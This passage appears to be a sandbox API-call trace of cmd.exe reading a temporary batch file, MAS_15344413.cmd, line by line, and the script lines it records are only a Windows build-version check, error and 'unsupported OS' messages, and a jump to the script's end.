lpCPInfo=0x7ff7bd729660) returned 1 [0177.282] SetThreadUILanguage (LangId=0x0) returned 0x409 [0177.282] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x84 [0177.283] _open_osfhandle (_OSFileHandle=0x84, _Flags=8) returned 3 [0177.283] _get_osfhandle (_FileHandle=3) returned 0x84 [0177.283] SetFilePointer (in: hFile=0x84, lDistanceToMove=3851, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xf0b [0177.283] GetProcessHeap () returned 0x19a8f1e0000 [0177.283] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f202920) returned 1 [0177.283] GetProcessHeap () returned 0x19a8f1e0000 [0177.284] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eabb0) returned 1 [0177.284] GetProcessHeap () returned 0x19a8f1e0000 [0177.284] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f2026a0) returned 1 [0177.284] GetProcessHeap () returned 0x19a8f1e0000 [0177.284] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ecd80) returned 1 [0177.284] GetProcessHeap () returned 0x19a8f1e0000 [0177.284] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee6d0) returned 1 [0177.285] _get_osfhandle (_FileHandle=3) returned 0x84 [0177.285] SetFilePointer (in: hFile=0x84, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xf0b [0177.285] ReadFile (in: hFile=0x84, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0177.285] SetFilePointer (in: hFile=0x84, lDistanceToMove=3853, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xf0d [0177.285] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="\r\n", cbMultiByte=2, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="\r\nt \"eline=echo: &call :_color %Red% \"==== ERROR ====\" &echo:\"\r\n2% | find /i \"0x0\" %nul1% && (set _NCS=0)\r\n===============================\r\n") returned 2 [0177.285] _get_osfhandle (_FileHandle=3) returned 0x84 [0177.285] GetFileType (hFile=0x84) returned 0x1 [0177.285] _get_osfhandle (_FileHandle=3) returned 0x84 [0177.285] SetFilePointer (in: hFile=0x84, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xf0d [0177.285] GetProcessHeap () returned 0x19a8f1e0000 [0177.285] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f203820 [0177.285] GetProcessHeap () returned 0x19a8f1e0000 [0177.286] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f203820) returned 1 [0177.286] _tell (_FileHandle=3) returned 3853 [0177.286] _close (_FileHandle=3) returned 0 [0177.286] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x84 [0177.286] _open_osfhandle (_OSFileHandle=0x84, _Flags=8) returned 3 [0177.286] _get_osfhandle (_FileHandle=3) returned 0x84 [0177.286] SetFilePointer (in: hFile=0x84, lDistanceToMove=3853, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xf0d [0177.287] _get_osfhandle (_FileHandle=3) returned 0x84 [0177.287] SetFilePointer (in: hFile=0x84, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xf0d [0177.287] ReadFile (in: hFile=0x84, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0177.287] SetFilePointer (in: hFile=0x84, lDistanceToMove=3993, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xf99 [0177.287] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="::========================================================================================================================================\r\n", cbMultiByte=140, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="::========================================================================================================================================\r\n") returned 140 [0177.287] _get_osfhandle (_FileHandle=3) returned 0x84 [0177.287] GetFileType (hFile=0x84) returned 0x1 [0177.287] _get_osfhandle (_FileHandle=3) returned 0x84 [0177.287] SetFilePointer (in: hFile=0x84, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xf99 [0177.287] GetProcessHeap () returned 0x19a8f1e0000 [0177.287] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f203820 [0177.287] GetProcessHeap () returned 0x19a8f1e0000 [0177.288] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f203820) returned 1 [0177.288] _tell (_FileHandle=3) returned 3993 [0177.288] _close (_FileHandle=3) returned 0 [0177.288] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x84 [0177.288] _open_osfhandle (_OSFileHandle=0x84, _Flags=8) returned 3 [0177.288] _get_osfhandle (_FileHandle=3) returned 0x84 [0177.288] SetFilePointer (in: hFile=0x84, lDistanceToMove=3993, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xf99 [0177.289] _get_osfhandle (_FileHandle=3) returned 0x84 [0177.289] SetFilePointer (in: hFile=0x84, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xf99 [0177.289] ReadFile (in: hFile=0x84, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0177.289] SetFilePointer (in: hFile=0x84, lDistanceToMove=3995, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xf9b [0177.289] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="\r\n", cbMultiByte=2, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="\r\n========================================================================================================================================\r\n") returned 2 [0177.289] _get_osfhandle (_FileHandle=3) returned 0x84 [0177.289] GetFileType (hFile=0x84) returned 0x1 [0177.289] _get_osfhandle (_FileHandle=3) returned 0x84 [0177.289] SetFilePointer (in: hFile=0x84, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xf9b [0177.289] GetProcessHeap () returned 0x19a8f1e0000 [0177.289] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f203820 [0177.289] GetProcessHeap () returned 0x19a8f1e0000 [0177.290] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f203820) returned 1 [0177.290] _tell (_FileHandle=3) returned 3995 [0177.290] _close (_FileHandle=3) returned 0 [0177.290] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x84 [0177.290] _open_osfhandle (_OSFileHandle=0x84, _Flags=8) returned 3 [0177.290] _get_osfhandle (_FileHandle=3) returned 0x84 [0177.290] SetFilePointer (in: hFile=0x84, lDistanceToMove=3995, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xf9b [0177.290] _get_osfhandle (_FileHandle=3) returned 0x84 [0177.290] SetFilePointer (in: hFile=0x84, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xf9b [0177.291] ReadFile (in: hFile=0x84, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0177.291] SetFilePointer (in: hFile=0x84, lDistanceToMove=4021, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xfb5 [0177.291] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="if %winbuild% LSS 7600 (\r\n", cbMultiByte=26, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="if %winbuild% LSS 7600 (\r\n================================================================================================================\r\n") returned 26 [0177.291] _get_osfhandle (_FileHandle=3) returned 0x84 [0177.291] GetFileType (hFile=0x84) returned 0x1 [0177.291] _get_osfhandle (_FileHandle=3) returned 0x84 [0177.291] SetFilePointer (in: hFile=0x84, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xfb5 [0177.291] GetProcessHeap () returned 0x19a8f1e0000 [0177.291] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f203820 [0177.291] GetProcessHeap () returned 0x19a8f1e0000 [0177.291] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4010) returned 0x19a8f207840 [0177.291] GetProcessHeap () returned 0x19a8f1e0000 [0177.291] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x22) returned 0x19a8f1eb980 [0177.291] GetEnvironmentVariableW (in: lpName="winbuild", lpBuffer=0x7ff7bd7296a0, nSize=0x2000 | out: lpBuffer="") returned 0x5 [0177.291] GetProcessHeap () returned 0x19a8f1e0000 [0177.292] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb980) returned 1 [0177.292] GetProcessHeap () returned 0x19a8f1e0000 [0177.292] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f207840) returned 1 [0177.292] GetProcessHeap () returned 0x19a8f1e0000 [0177.293] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f203820) returned 1 [0177.293] _wcsicmp (_String1="if", _String2=")") returned 64 [0177.293] _wcsicmp (_String1="FOR", _String2="if") returned -3 [0177.293] _wcsicmp (_String1="FOR/?", _String2="if") returned -3 [0177.293] _wcsicmp (_String1="IF", _String2="if") returned 0 [0177.293] _wcsicmp (_String1="IF/?", _String2="if") returned 47 [0177.293] GetProcessHeap () returned 0x19a8f1e0000 [0177.293] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1edd10 [0177.293] GetProcessHeap () returned 0x19a8f1e0000 [0177.293] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x16) returned 0x19a8f1ecc60 [0177.293] GetProcessHeap () returned 0x19a8f1e0000 [0177.293] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x28) returned 0x19a8f1eb9e0 [0177.293] GetProcessHeap () returned 0x19a8f1e0000 [0177.293] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1eb9e0, Size=0x1e) returned 0x19a8f1eb8f0 [0177.293] GetProcessHeap () returned 0x19a8f1e0000 [0177.293] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1eb8f0) returned 0x1e [0177.293] _wcsicmp (_String1="10586", _String2="/I") returned 2 [0177.293] GetProcessHeap () returned 0x19a8f1e0000 [0177.293] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee190 [0177.294] GetProcessHeap () returned 0x19a8f1e0000 [0177.294] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1c) returned 0x19a8f1eb920 [0177.294] _wcsicmp (_String1="ERRORLEVEL", _String2="10586") returned 52 [0177.294] _wcsicmp (_String1="EXIST", _String2="10586") returned 52 [0177.294] _wcsicmp (_String1="CMDEXTVERSION", _String2="10586") returned 50 [0177.294] _wcsicmp (_String1="DEFINED", _String2="10586") returned 51 [0177.294] _wcsicmp (_String1="NOT", _String2="10586") returned 61 [0177.294] GetProcessHeap () returned 0x19a8f1e0000 [0177.294] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1c) returned 0x19a8f1eb6e0 [0177.294] _wcsicmp (_String1="LSS", _String2="EQU") returned 7 [0177.294] _wcsicmp (_String1="LSS", _String2="NEQ") returned -2 [0177.294] _wcsicmp (_String1="LSS", _String2="LSS") returned 0 [0177.294] GetProcessHeap () returned 0x19a8f1e0000 [0177.294] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1a) returned 0x19a8f1eb950 [0177.294] GetProcessHeap () returned 0x19a8f1e0000 [0177.294] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee0d0 [0177.294] _get_osfhandle (_FileHandle=3) returned 0x84 [0177.294] SetFilePointer (in: hFile=0x84, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xfb5 [0177.294] ReadFile (in: hFile=0x84, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efebc0, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efebc0*=0x1fff, lpOverlapped=0x0) returned 1 [0177.295] SetFilePointer (in: hFile=0x84, lDistanceToMove=4032, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xfc0 [0177.295] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="%nceline%\r\n", cbMultiByte=11, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="%nceline%\r\nd% LSS 7600 (\r\n================================================================================================================\r\n") returned 11 [0177.295] _get_osfhandle (_FileHandle=3) returned 0x84 [0177.295] GetFileType (hFile=0x84) returned 0x1 [0177.295] _get_osfhandle (_FileHandle=3) returned 0x84 [0177.295] SetFilePointer (in: hFile=0x84, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xfc0 [0177.295] GetProcessHeap () returned 0x19a8f1e0000 [0177.295] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f203820 [0177.295] GetProcessHeap () returned 0x19a8f1e0000 [0177.295] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4010) returned 0x19a8f207840 [0177.295] GetProcessHeap () returned 0x19a8f1e0000 [0177.295] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x20) returned 0x19a8f1eb980 [0177.295] GetEnvironmentVariableW (in: lpName="nceline", lpBuffer=0x7ff7bd7296a0, nSize=0x2000 | out: lpBuffer="") returned 0x22 [0177.295] GetProcessHeap () returned 0x19a8f1e0000 [0177.296] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb980) returned 1 [0177.296] GetProcessHeap () returned 0x19a8f1e0000 [0177.296] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f207840) returned 1 [0177.296] GetProcessHeap () returned 0x19a8f1e0000 [0177.296] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f203820) returned 1 [0177.297] _wcsicmp (_String1="FOR", _String2="echo:") returned 1 [0177.297] _wcsicmp (_String1="FOR/?", _String2="echo:") returned 1 [0177.297] _wcsicmp (_String1="IF", _String2="echo:") returned 4 [0177.297] _wcsicmp (_String1="IF/?", _String2="echo:") returned 4 [0177.297] _wcsicmp (_String1="REM", _String2="echo:") returned 13 [0177.297] _wcsicmp (_String1="REM/?", _String2="echo:") returned 13 [0177.297] GetProcessHeap () returned 0x19a8f1e0000 [0177.297] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee910 [0177.297] GetProcessHeap () returned 0x19a8f1e0000 [0177.297] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1c) returned 0x19a8f1eb980 [0177.297] GetProcessHeap () returned 0x19a8f1e0000 [0177.297] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x14) returned 0x19a8f1ecaa0 [0177.297] GetProcessHeap () returned 0x19a8f1e0000 [0177.297] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee610 [0177.297] _wcsicmp (_String1="FOR", _String2="echo") returned 1 [0177.297] _wcsicmp (_String1="FOR/?", _String2="echo") returned 1 [0177.297] _wcsicmp (_String1="IF", _String2="echo") returned 4 [0177.297] _wcsicmp (_String1="IF/?", _String2="echo") returned 4 [0177.300] _wcsicmp (_String1="REM", _String2="echo") returned 13 [0177.300] _wcsicmp (_String1="REM/?", _String2="echo") returned 13 [0177.300] GetProcessHeap () returned 0x19a8f1e0000 [0177.300] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee010 [0177.300] GetProcessHeap () returned 0x19a8f1e0000 [0177.300] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1a) returned 0x19a8f1eb6b0 [0177.300] GetProcessHeap () returned 0x19a8f1e0000 [0177.300] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x34) returned 0x19a8f1e0c70 [0177.300] GetProcessHeap () returned 0x19a8f1e0000 [0177.300] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee550 [0177.300] _wcsicmp (_String1="FOR", _String2="echo:") returned 1 [0177.300] _wcsicmp (_String1="FOR/?", _String2="echo:") returned 1 [0177.300] _wcsicmp (_String1="IF", _String2="echo:") returned 4 [0177.300] _wcsicmp (_String1="IF/?", _String2="echo:") returned 4 [0177.300] _wcsicmp (_String1="REM", _String2="echo:") returned 13 [0177.300] _wcsicmp (_String1="REM/?", _String2="echo:") returned 13 [0177.301] GetProcessHeap () returned 0x19a8f1e0000 [0177.301] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee850 [0177.301] GetProcessHeap () returned 0x19a8f1e0000 [0177.301] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1c) returned 0x19a8f1eb710 [0177.301] _get_osfhandle (_FileHandle=3) returned 0x84 [0177.301] SetFilePointer (in: hFile=0x84, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xfc0 [0177.301] ReadFile (in: hFile=0x84, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efeb00, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efeb00*=0x1fff, lpOverlapped=0x0) returned 1 [0177.301] SetFilePointer (in: hFile=0x84, lDistanceToMove=4084, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xff4 [0177.301] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo Unsupported OS version detected [%winbuild%].\r\n", cbMultiByte=52, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="echo Unsupported OS version detected [%winbuild%].\r\n======================================================================================\r\n") returned 52 [0177.301] _get_osfhandle (_FileHandle=3) returned 0x84 [0177.301] GetFileType (hFile=0x84) returned 0x1 [0177.301] _get_osfhandle (_FileHandle=3) returned 0x84 [0177.301] SetFilePointer (in: hFile=0x84, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xff4 [0177.301] GetProcessHeap () returned 0x19a8f1e0000 [0177.301] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f203820 [0177.302] GetProcessHeap () returned 0x19a8f1e0000 [0177.302] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4010) returned 0x19a8f207840 [0177.302] GetProcessHeap () returned 0x19a8f1e0000 [0177.307] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x22) returned 0x19a8f1eb740 [0177.307] GetEnvironmentVariableW (in: lpName="winbuild", lpBuffer=0x7ff7bd7296a0, nSize=0x2000 | out: lpBuffer="") returned 0x5 [0177.307] GetProcessHeap () returned 0x19a8f1e0000 [0177.308] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb740) returned 1 [0177.308] GetProcessHeap () returned 0x19a8f1e0000 [0177.308] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f207840) returned 1 [0177.308] GetProcessHeap () returned 0x19a8f1e0000 [0177.309] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f203820) returned 1 [0177.309] GetProcessHeap () returned 0x19a8f1e0000 [0177.309] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ede90 [0177.309] _wcsicmp (_String1="FOR", _String2="echo") returned 1 [0177.309] _wcsicmp (_String1="FOR/?", _String2="echo") returned 1 [0177.309] _wcsicmp (_String1="IF", _String2="echo") returned 4 [0177.309] _wcsicmp (_String1="IF/?", _String2="echo") returned 4 [0177.309] _wcsicmp (_String1="REM", _String2="echo") returned 13 [0177.309] _wcsicmp (_String1="REM/?", _String2="echo") returned 13 [0177.309] GetProcessHeap () returned 0x19a8f1e0000 [0177.309] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1edf50 [0177.309] GetProcessHeap () returned 0x19a8f1e0000 [0177.310] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1a) returned 0x19a8f1eb7a0 [0177.310] GetProcessHeap () returned 0x19a8f1e0000 [0177.310] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x64) returned 0x19a8f1eaed0 [0177.310] _get_osfhandle (_FileHandle=3) returned 0x84 [0177.310] SetFilePointer (in: hFile=0x84, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xff4 [0177.310] ReadFile (in: hFile=0x84, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efead0, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efead0*=0x1fff, lpOverlapped=0x0) returned 1 [0177.310] SetFilePointer (in: hFile=0x84, lDistanceToMove=4171, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x104b [0177.310] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo Project is supported only for Windows 7/8/8.1/10/11 and their Server equivalent.\r\n", cbMultiByte=87, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="echo Project is supported only for Windows 7/8/8.1/10/11 and their Server equivalent.\r\n===================================================\r\n") returned 87 [0177.310] _get_osfhandle (_FileHandle=3) returned 0x84 [0177.310] GetFileType (hFile=0x84) returned 0x1 [0177.310] _get_osfhandle (_FileHandle=3) returned 0x84 [0177.310] SetFilePointer (in: hFile=0x84, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x104b [0177.310] GetProcessHeap () returned 0x19a8f1e0000 [0177.310] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f203820 [0177.311] GetProcessHeap () returned 0x19a8f1e0000 [0177.311] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f203820) returned 1 [0177.311] GetProcessHeap () returned 0x19a8f1e0000 [0177.311] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1edc50 [0177.311] _wcsicmp (_String1="FOR", _String2="echo") returned 1 [0177.311] _wcsicmp (_String1="FOR/?", _String2="echo") returned 1 [0177.311] _wcsicmp (_String1="IF", _String2="echo") returned 4 [0177.311] _wcsicmp (_String1="IF/?", _String2="echo") returned 4 [0177.311] _wcsicmp (_String1="REM", _String2="echo") returned 13 [0177.311] _wcsicmp (_String1="REM/?", _String2="echo") returned 13 [0177.311] GetProcessHeap () returned 0x19a8f1e0000 [0177.311] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee3d0 [0177.312] GetProcessHeap () returned 0x19a8f1e0000 [0177.312] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1a) returned 0x19a8f1eb860 [0177.312] GetProcessHeap () returned 0x19a8f1e0000 [0177.312] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb4) returned 0x19a8f1ee9d0 [0177.312] _get_osfhandle (_FileHandle=3) returned 0x84 [0177.312] SetFilePointer (in: hFile=0x84, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x104b [0177.312] ReadFile (in: hFile=0x84, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efeaa0, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efeaa0*=0x1fff, lpOverlapped=0x0) returned 1 [0177.312] SetFilePointer (in: hFile=0x84, lDistanceToMove=4184, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1058 [0177.312] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="goto MASend\r\n", cbMultiByte=13, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="goto MASend\r\nis supported only for Windows 7/8/8.1/10/11 and their Server equivalent.\r\n===================================================\r\n") returned 13 [0177.312] _get_osfhandle (_FileHandle=3) returned 0x84 [0177.312] GetFileType (hFile=0x84) returned 0x1 [0177.312] _get_osfhandle (_FileHandle=3) returned 0x84 [0177.312] SetFilePointer (in: hFile=0x84, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1058 [0177.312] GetProcessHeap () returned 0x19a8f1e0000 [0177.312] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f203820 [0177.312] GetProcessHeap () returned 0x19a8f1e0000 [0177.313] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f203820) returned 1 [0177.313] GetProcessHeap () returned 0x19a8f1e0000 [0177.313] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, 